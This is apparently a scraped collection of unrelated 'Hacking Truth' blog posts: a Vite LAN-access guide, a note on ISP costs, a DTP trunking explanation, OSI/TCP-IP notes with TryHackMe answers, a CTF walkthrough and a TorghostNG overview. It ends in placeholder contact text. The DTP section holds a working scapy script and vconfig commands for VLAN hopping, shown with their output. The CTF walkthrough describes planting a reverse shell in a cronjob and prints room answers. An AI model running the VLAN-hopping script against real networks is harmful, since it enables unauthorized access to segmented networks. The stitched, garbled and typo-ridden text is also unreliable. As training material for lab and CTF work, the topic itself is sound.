Access your reactjs app on another device within the same network
Certainly, Reactjs is a JavaScript library developed by Facenook for
building user interfaces. It allows developers to create reusable UI
components and effciently manage the state of their applications. Here are
some key aspects of Reactjs.
Now we will run a ReactJS Vite app hosted on localhost:5173 on another laptop
within the same network, but you need to make a few adjustments like this -
Steps to Access the Vite App on Another Laptop:
1) Ensure Both Devices Are on the Same Network:
Both laptops should be connected to the same Wi-Fi or local area network
(LAN).
2) Find the Host Laptop's IP Address
On Windows:
Open Command Prompt and type: ipconfig Look for
the IPv4 address under your active network connection.
On macOS/Linux: Open the terminal and type: ifconfig or ip
addr Find the IP address of the active network interface.
3) Run the Vite App
Start your Vite development server by running npm run dev (or
yarn dev) on the host laptop.
4) Update the URL
Instead of localhost:5173, use the host laptop's IP address with
port 5173. For example:
http://<HOST_LAPTOP_IP>:5173
Replace
<HOST_LAPTOP_IP> with the actual IP address, like
192.168.1.10:5173.
5) Allow Connections Through Firewall (If Necessary)
On Windows: Search for "Windows Defender Firewall"
> "Allow an app or feature through Windows Defender Firewall." Ensure your development environment (e.g., Node.js) is allowed for
both private and public networks.
On macOS/Linux:
Ensure the firewall (if enabled) allows incoming connections on port 5173.
Access
the App on Another Laptop Open a browser on the second laptop and type
the IP-based URL (e.g.,
http://192.168.1.10:5173).
Notes:
If you're using Vite's default configuration, it binds the
server to localhost. To make it accessible to other devices, you may need to
modify the vite.config.js:
Restart the server after making
this change.
export default {
server: {
host: '0.0.0.0', // Allows connections from other devices
port: 5173,
},
};
Disclaimer
All tutorials are for informational and educational purposes only and have
been made using our own routers, servers, websites and other vulnerable free
resources. we do not contain any illegal activity. We believe that ethical
hacking, information security and cyber security should be familiar subjects
to anyone using digital information and computers. Hacking Truth is against
misuse of the information and we strongly suggest against it. Please regard
the word hacking as ethical hacking or penetration testing every time this
word is used. We do not promote, encourage, support or excite any illegal
activity or hacking.
ISP stands for internet service providers which are those whom
help us to access internet. For example Jio, Airtel, BSNL etc.
one of the reason is because ISP spends
his own money for transmiting internet over optical Fibre and optical
fibre is too costly. Sometimes opticalfibre get damaged so onthat time maintainance and
repairing cost and efforts are too high.
The money spent over optical fibre thorugh deep sea is too
costly and difficult it needs a lot of efforts team work and experts
peoples.
Transmiting the internet over the country via
cell towers and wifi towers is also need money for construction and
maintainance. They also provice serivces to customers. They also hire
employee for provide us best experience.
These are just few of
reason about why we need to pay to ISP for internet!!!
Disclaimer
All tutorials are for informational and educational
purposes only and have been made using our own routers, servers, websites and
other vulnerable free resources. we do not contain any illegal activity. We
believe that ethical hacking, information security and cyber security should be
familiar subjects to anyone using digital information and computers. Hacking
Truth is against misuse of the information and we strongly suggest against it.
Please regard the word hacking as ethical hacking or penetration testing every
time this word is used. We do not promote, encourage, support or excite any
illegal activity or hacking.
DTP stands for dynamic trunking protocol. This protocol is basically cisco proprietary protocol which is
layer 2 protcol that means it once only one cisco devices and it
operates are layer 2 OSI Model and this protocol is used to form trunking
automatically between two switches and the DTP feature is bydefault enabled on
cisco switches.
So, lets understand about the Mode in DTP -
actually by default whenever you buy a new switch ports will be
dynamically auto or it will be dynamicallydesirable so lets understand one by one, the dynamic auto.
Dynamic Auto :- In this mode the switchport will wait for the neighbor to initiate, order to form trunk. Like the
dynamic the ports switch which are in dynamic auto mode they will never
initiate to form the trunk, They can form trunk but when the never will
initiate. They themselves don't initiate to form the trunk.
Dynamic Desirable :- In this mode the switchport actively participate to form trunk thats mean
if this switch port are current dynamic desirable mode then they will
themselves initiate and they will form the trunk. So, along with the trunk in
encapsulation will also be negotiated between two swiches so let me show you
with the helo of figure that we mentioned below.
So,
here is the port the dynamic switch auto and other one is dynamic auto also so
they will exchange the DTP messages but no body will be initiate
because both are in dynamicautomode , the ports
which are in dynamic auto mode they cannot initiate to form the
trunk and in this case
The DD will also be send DTP, the DD will also send, so in
this case the ports will initiate to form the trunk and when the neighbor will
initiate to form the trunk, the DD will also accepted and they will form the
trunks, so in this case the trunk will be dynamically from between the two
switches.
Here they will exchange the DTP messages and they
both will initiate
Additional Detail- Let's read For short refreshing:
Ethernet is on
Layer2, IP (Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on Layer 4–6 and
services like HTTP, SMTP, FTP on Layer 7.
Also read -
Code Your Own ARP Spoofing Over VLAN Hopping -
CLICK HERE Code your own MAC Flooding Tool -
CLICK HERE Defend ARP poisoning attacks -
CLICK HERE Code your own ARP Cache Poisoning -
CLICK HERE
Thanks to the
DTP protocoland its property to completely overlook any kind of security we now can send
a single Dynamic-Desirable packet to every DTP enabled Cisco device and ask it
to change our port into a trunk port.
Code Your Own DTP Packet
#!/usr/bin/python3
import sys
from scapy.layers.l2 import Dot3 , LLC, SNAP
from scapy.contrib.dtp import *
if len(sys.argv) < 2:
print(sys.argv[0] + " <dev>")
sys.exit()
negotiate_trunk(iface=sys.argv[1])
As an optional parameter you can set the MAC address of the
spoofed neighbor switch if none is set a random one will be automatically
generated.
The attack can last some minutes, but an attacker doesn’t care about the
delay, because they know what they get in exchange the possibility to connect
to every VLAN!
sudo vconfig add eth0 <vlan-id>
sudo ifconfig eth0.<vlan-id> <ip_of_vlan> up
example -
vconfig add wlan0 1
ifconfig wlan0.1 192.168.13.15 up
NOTE- <ip_of_vlan> thats mean as per your need or you can any IP with
your mind.
Now we can run program with wlan0.1 interface (see the code above).
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 dtp-trunk.py wlan0.1
[sudo] password for hackerboy:
Trying to negotiate a trunk on interface wlan0.1
.
Sent 1 packets.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$
Disclaimer
All tutorials are for informational and educational purposes only and have been
made using our own routers, servers, websites and other vulnerable free
resources. we do not contain any illegal activity. We believe that ethical
hacking, information security and cyber security should be familiar subjects to
anyone using digital information and computers.
Hacking Truth is
against misuse of the information and we strongly suggest against it. Please
regard the word hacking as ethical hacking or penetration testing every time
this word is used. We do not promote, encourage, support or excite any illegal
activity or hacking.
In a computer network, machines can communicate with each other by
means of protocols.
This protocols ensures that
computers can communicate with different hardware and software
for their use. Largely different types of networks have these
protocols on the Internet and each has its own
purpose.
Do you know what the primary goal of networking is? Let us know about
networking packets The primary goal of networking is to exchange information
between computer networks, this information is carried by packets.
Packets
Packets are nothing but streams of bits used for
data transmission over physical media as electric signals. Such media as a wire in a LAN ( local area network ) or the
air in a WiFi network.
These electricals signals are
then interpreted as bits ( zeros and ones ) that make up the
information. Every packets in every protocol has the following structure.
The header has a protocol specific structure. This ensures that the
receiving host can properly interpret the payload and handle the entire
communication.
The header has a protocol specific structure. This ensures that the
receiving host can properly interpret the payload and handle the entire
communication.
This payload is the actual information so it could be something like
part of an email messages what the content of a file during download of any
messages.
Example The IP Header
For example, the internet protocol header is atleast 160 bits (20 bytes)
long, and it includes information to interpret the content of the IP
packets.
Pic Credit Ine
The first four bits identify the Internet protocol (IP) version. Today
they can be used to represent IP version 4 or 6.
Pic Credit Ine
The 32 bits starting at position 96 represent the source
address.
There are many protocols out there, each for a specific purpose.
Purpose like -
# Transmitting data. #
identifying computers on a network. # Exchanging emails, files or
performing VoIP calls. # Establishing a communication between the
a server and a client.
Instead of using specific
examples, let's focusing on the features that a protocol provides-
#
Use the physical media to send packets. # identify hosts #
Make an application ( email client, FTP, browsers, ....) work. # transport data between processes ( the server and the client programs ).
These
layers work on top of one another and every layer has its own protocols.
For example -
A few examples of application layer protocols are the
Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Post
Office Protocol (POP), Simple Mail Transfer Protocol (SMTP), and Domain Name
System (DNS). The application layer does not need to know how to identify a process
on a host, how to reach it and how to use the copper wire to establish a
communication.
It's just uses its underlying layers.
The OSI Model
The OSI (Open Systems Interconnection) Model is a standardised model which we use to demonstrate the
theory behind computer networking. In practice, it's actually the more
compact TCP/IP model that real-world networking is based off;
however the OSI model, in many ways, is easier to get an initial understanding
from. The OSI Model: An Overview
There are many mnemonics floating around to help you learn the layers of the
OSI model -- search around until you find one that you like.
Let's briefly take a look at each of these in turn:
So let's know how the protocols work with each other. If each
protocol has header and payload, then how can the protocol use these lower
layers?
The entire upper protocol packet ( header and
payload ) is the payload of the lower one, this is called encapsulation. TCP
is the real world implementation of a networking stack and is the protocol
stack used on the internet.
The TCP/IP model is, in many ways, very similar to the OSI model. It's a few
years older, and serves as the basis for real-world networking. The TCP/IP
model consists of four layers: Application, Transport, Internet and Network
Interface. Between them, these cover the same range of functions as the seven
layers of the OSI Model. The TCP IP Model in Networking
You would be justified in asking why we bother with the OSI model if it's not
actually used for anything in the real-world. The answer to that question is
quite simply that the OSI model (due to being less condensed and more rigid
than the TCP/IP model) tends to be easier for learning the initial theory of
networking.
For More Details Click on the below iframe slowly slowly -
All tutorials are for informational and educational purposes only and have
been made using our own routers, servers, websites and other vulnerable free
resources. we do not contain any illegal activity. We believe that ethical
hacking, information security and cyber security should be familiar subjects
to anyone using digital information and computers.
Hacking Truth is
against misuse of the information and we strongly suggest against it. Please
regard the word hacking as ethical hacking or penetration testing every time
this word is used. We do not promote, encourage, support or excite any illegal
activity or hacking.
The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model. The TCP IP Model in Networking
You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real-world. The answer to that question is quite simply that the OSI model (due to being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.
The two models match up something like this:
The processes of encapsulation and de-encapsulation work in exactly the same way with the TCP/IP model as they do with the OSI model. At each layer of the TCP/IP model a header is added during encapsulation, and removed during de-encapsulation.
Now let's get down to the practical side of things.
A layered model is great as a visual aid -- it shows us the general process of how data can be encapsulated and sent across a network, but how does it actually happen?
When we talk about TCP/IP, it's all well and good to think about a table with four layers in it, but we're actually talking about a suite of protocols -- sets of rules that define how an action is to be carried out. TCP/IP takes its name from the two most important of these: the Transmission Control Protocol (which we touched upon earlier in the OSI model) that controls the flow of data between two endpoints, and the Internet Protocol, which controls how packets are addressed and sent. There are many more protocols that make up the TCP/IP suite; we will cover some of these in later tasks. For now though, let's talk about TCP.
As mentioned earlier, TCP is a connection-based protocol. In other words, before you send any data via TCP, you must first form a stable connection between the two computers. The process of forming this connection is called the three-way handshake.
When you attempt to make a connection, your computer first sends a special request to the remote server indicating that it wants to initialise a connection. This request contains something called a SYN (short for synchronise) bit, which essentially makes first contact in starting the connection process. The server will then respond with a packet containing the SYN bit, as well as another "acknowledgement" bit, called ACK. Finally, your computer will send a packet that contains the ACK bit by itself, confirming that the connection has been setup successfully. With the three-way handshake successfully completed, data can be reliably transmitted between the two computers. Any data that is lost or corrupted on transmission is re-sent, thus leading to a connection which appears to be lossless.
We're not going to go into exactly how this works on a step-to-step level -- not in this room at any rate. It is sufficient to know that the three-way handshake must be carried out before a connection can be established using TCP.
History:
It's important to understand exactly why the TCP/IP and OSI models were originally created. To begin with there was no standardisation -- different manufacturers followed their own methodologies, and consequently systems made by different manufacturers were completely incompatible when it came to networking. The TCP/IP model was introduced by the American DoD in 1982 to provide a standard -- something for all of the different manufacturers to follow. This sorted out the inconsistency problems. Later the OSI model was also introduced by the International Organisation for Standardisation (ISO); however, it's mainly used as a more comprehensive guide for learning, as the TCP/IP model is still the standard upon which modern networking is based.
#1 Which model was introduced first, OSI or TCP/IP?
ans :- TCP/IP
#2 Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?
ANs :- transport
#3 Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?
Ans :- Application
#4 The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?
Ans :- Physical
#5 Which layer of the TCP/IP model handles the functionality of the OSI network layer?
Ans :- Internet
#6 What kind of protocol is TCP?
Ans :- Connection-based
#7 What is SYN short for?
Ans:- Synchronise
#8 What is the second step of the three way handshake?
Ans :- SYN/ACK
#9 What is the short name for the "Acknowledgement" segment in the three-way handshake?
Ans :- ACK
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. Easy Peasy TryHackMe walkthrough
[Task 1] Enumeration through Nmap
Deploy the machine attached to this task and use nmap to enumerate it.
#1 How many ports are open?
nmap -A -Pn -T4 -p- 10.10.158.249 --script vuln
Ans :-
#2 What is the version of nginx?
Ans :-
#3 What is running on the highest port?
Ans :-
Notice we have 3 ports open:
· 80: nginx 1.16.1
· 6498: OpenSSH 7.6p1
· 65524: Apache httpd 2.4.43
[Task 2] Compromising the machine
Now you've enumerated the machine, answer questions and compromise it!
#1 Using GoBuster, find flag 1.
Now, the fun part begins!
The questions in this task require us to find hidden pages and files. Hence, we can start directory scan...
gobuster -e .php,.html,.txt dir -u http://TryHackMeIP/ -w /usr/share/dirb/wordlists/common.txt
OR
-e : For extension like .php .html .txt
dir : For Find a directory
-u : For URL
-w : For wordlists path
We see robots.txt and a directory named “hidden”. You can check them out, but there is only dead end. For further enumeration, let’s enumerate this “hidden” directory too.
gobuster -e .php,.html,.txt dir -u http://10.10.158.249/hidden/ -w /usr/share/dirb/wordlists/common.txt
Yeah, /whatever. Let us check what’s inside its source code, shall we?
Nice! Our first flag with base64 encode. Let’s decode it with:
Ans :-
#2 Further enumerate the machine, what is flag 2?
Now we can move on to find our 2nd Flag. Let us run gobuster to find hidden directories again.
gobuster dir -u http://10.10.137.230:65524/ -w /usr/share/wordlists/dirb/common.txt
Let’s check the “robots.txt” and notice a hash over there waiting to be cracked.
The thing is, we may know it is a md5, but cannot crack. I searched everywhere and found the only website to crack! This is the website:
#6 What is the password to login to the machine via SSH?
It was a hidden password after all we will use just a bit later. (Or now.)
Remember the image on the hidden directory? Let’s download it on our desktop to reveal what’s inside…
Use steghide to extract secrets out of this image and enter the password we just cracked.
You can install it by:
apt install steghide
steghide extract -sf binarycodepixabay.jpg
Something will be extracted up as a secret
text. Inside the text, we notice there is a username (boring) and a
password as SSH login, but the password is all binary.
To solve the last question, I needed to get a root access. Thanks to the sentence in the description: “Then escalate your privileges through a vulnerable cronjob.” I found the vulnerable cronjob who locates in the /var/www directory. It was a hidden sh file who could be edited and executed. I’ve inserted the following code into the file to get a reverse shell.
At the same time, I also started a netcat listener to get my root shell. And after a minute I got it. I used the whoami command to check if I really was root. And yes I was. The root.txt was also a hidden file, so I used the ls -la command to list the hidden files and lastly used the cat command to read it.
This CTF was pretty fun to do and also pretty hard. I want to thank Kral4 again for this beautiful CTF and make sure to try it out. Thank you for reading.
Ans :-
Video Tutorial :-
Part - 1
Part - 2
Disclaimer
This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!
All
video’s and tutorials are for informational and educational purposes
only. We believe that ethical hacking, information security and cyber
security should be familiar subjects to anyone using digital information
and computers. We believe that it is impossible to defend yourself from
hackers without knowing how hacking is done. The tutorials and videos
provided on www.hackingtruth.in is
only for those who are interested to learn about Ethical Hacking,
Security, Penetration Testing and malware analysis. Hacking tutorials is
against misuse of the
information and we strongly suggest against it. Please regard the word
hacking as ethical hacking or penetration testing every time this word
is used.
All tutorials and videos have been
made using our own routers, servers, websites and other resources, they
do not contain any illegal activity. We do not promote, encourage,
support or excite any illegal activity or hacking without written
permission in general. We want to raise security awareness and inform
our readers on how to prevent themselves from being a victim of hackers.
If you plan to use the information for illegal purposes, please leave
this website now. We cannot be held responsible for any misuse of the
given information.
- Hacking Truth by Kumar Atul Jaiswal
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)
So today we will know about the open source tool that helps in keep anonymous, TorghostNG - Make all your internet traffic anonymized with Tor network. This tool is
scripted in python language as you can tell -_- you can help us by
subscribing to
our youtube channel :. Kumar Atul Jaiswal .: before using the too.
About TorghostNG
TorghostNG is a tool that make all your internet traffic anonymized through Tor network.
Rewritten from TorGhost with Python 3.
TorghostNG was tested on:
Kali Linux
Manjaro
...
Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes. It has application for both stand-alone systems and multi-user networks.
TorghostNG - Make all your internet traffic anonymized with Tor network.
Before you use TorghostNG
For the goodness of Tor network, BitTorrent traffic will be blocked by iptables. Although you can bypass it with some tweaks with your torrent client disappointed_relieved. It's difficult to completely block all torrent traffic.
For security reason, TorghostNG is gonna disable IPv6 to prevent IPv6 leaks (it happened to me lmao or whatismyip.live). tor network TorghostNG - How to anonymize your internet traffic
Installing TorghostNG
TorghostNG currently supports:
GNU/Linux distros that based on Arch Linux
GNU/Linux distros that based on Debian/Ubuntu
GNU/Linux distros that based on Fedora, CentOS, RHEL, openSUSE
Solus OS
Void Linux
Anh the elder guy: Slackware
(Too much package managers for one day :v) torghostng
This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This
information shall only be used to expand knowledge and not for causing
malicious or damaging attacks. Performing any hacks without written
permission is illegal ..!
All video’s and
tutorials are for informational and educational purposes only. We
believe that ethical hacking, information security and cyber security
should be familiar subjects to anyone using digital information and
computers. We believe that it is impossible to defend yourself from
hackers without knowing how hacking is done. The tutorials and videos
provided on www.hackingtruth.in is only for those who are
interested to learn about Ethical Hacking, Security, Penetration Testing
and malware analysis. Hacking tutorials is against misuse of the
information and we strongly suggest against it. Please regard the word
hacking as ethical hacking or penetration testing every time this word
is used.
All tutorials and videos
have been made using our own routers, servers, websites and other
resources, they do not contain any illegal activity. We do not promote,
encourage, support or excite any illegal activity or hacking without
written permission in general. We want to raise security awareness and
inform our readers on how to prevent themselves from being a victim of
hackers. If you plan to use the information for illegal purposes, please
leave this website now. We cannot be held responsible for any misuse of
the given information.
View kumar atul jaiswal's profile on LinkedIn, the world's largest professional community. kumar atul has 2 jobs listed on their profile. See the complete profile on LinkedIn and discover kumar atul's connections and jobs at similar companies.
For enquiries you can contact us in several different ways. Contact details are below.
Hacking Truth.in
Street :Road Street 00
Person :Person
Phone :+045 123 755 755
Country :POLAND
Email :contact@heaven.com
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.